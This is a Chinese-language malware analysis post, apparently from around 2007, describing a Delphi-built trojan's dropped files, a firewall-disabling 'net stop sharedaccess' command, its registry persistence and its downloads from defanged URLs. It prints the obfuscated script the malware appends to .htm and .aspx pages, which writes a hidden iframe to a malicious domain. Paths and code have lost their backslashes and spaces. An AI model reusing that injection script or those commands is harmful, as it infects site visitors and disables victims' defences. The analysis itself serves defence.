在FF看到这消息..于是就把网页解开了..

原来是"老朋友"刺客集团..已经多次和这个集团生成的网马打交道了..

其中挂上一个木马

hxxp://www.es86.com/pic/ddb/2006692151148920.gif

就此做个分析吧..

运行样本.

释放文件

C:win30.exe

调用cmd运行命令/cnetstopsharedaccess

访问网站

61.129.102.79

地址应该是:hxxp://www.es86.com80端口通讯

下载:hxxp://www.es86.com/es86/db/dvbbs.mdb

此文件为rar文件..

dvbbs.mdb释放出文件为

C:ProgramFilesCommonFilesMicrosoftSharedwebserverextensions40botsvinavbareCompress.fne

C:ProgramFilesCommonFilesMicrosoftSharedwebserverextensions40botsvinavbareImgConverter.fne

C:ProgramFilesCommonFilesMicrosoftSharedwebserverextensions40botsvinavbareLIB.fne

C:ProgramFilesCommonFilesMicrosoftSharedwebserverextensions40botsvinavbarHideProc.dll

C:ProgramFilesCommonFilesMicrosoftSharedwebserverextensions40botsvinavbarinternet.fne

C:ProgramFilesCommonFilesMicrosoftSharedwebserverextensions40botsvinavbarkrnln.fnr

C:ProgramFilesCommonFilesMicrosoftSharedwebserverextensions40botsvinavbarmop

C:ProgramFilesCommonFilesMicrosoftSharedwebserverextensions40botsvinavbarmoz

C:ProgramFilesCommonFilesMicrosoftSharedwebserverextensions40botsvinavbarNhook.dll

C:ProgramFilesCommonFilesMicrosoftSharedwebserverextensions40botsvinavbarshell.fne

C:ProgramFilesCommonFilesMicrosoftSharedwebserverextensions40botsvinavbarsvchost.exe

写入注册表

[HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun]

"svchost"="C:ProgramFilesCommonFilesMicrosoftSharedwebserverextensions40botsvinavbarsvchost.exe"

在htm和aspx尾部加入代码

<script>

p="60,105,102,114,97,109,101,32,104,101,105,103,104,116,61,48,32,119,105,100,116,104,61,48,32,115,114,99,61,34,104,116,116,112,58,47,47,97,45,108,46,109,101,105,98,117,46,99,111,109,47,34,62,60,47,105,102,114,97,109,101,62"

p=eval("String.fromCharCode("+p+")");

document.write(p);</script>

解密为

<script>

p="<iframeheight=0width=0src="http://a-l.meibu.com/"></iframe>"

p=eval("String.fromCharCode("+p+")");

document.write(p);</script>

在线扫描

AntiVir7.3.1.3803.02.2007TR/Crypt.NSPM.Gen

BitDefender7.203.02.2007DeepScan:Generic.Malware.PWYddldPk.D212BB22

eSafe7.0.14.002.28.2007suspiciousTrojan/Worm

F-Secure6.70.13030.003.02.2007W32/Downloader

IkarusT3.1.1.303.02.2007Backdoor.Win32.Hupigon.BV

NOD32v2209003.02.2007avariantofWin32/Delf.AG

Norman5.80.0203.02.2007W32/Downloader

Panda9.0.0.403.01.2007Suspiciousfile

以上分析都在虚拟机里完成的..

这次加的壳实在脱不开..无法查看更详细..

不过猜测编写语言为BorlandDelphi6.0-7.0

尝试关闭一些安全软件估计也有..

=.=再此感叹..这什么破壳..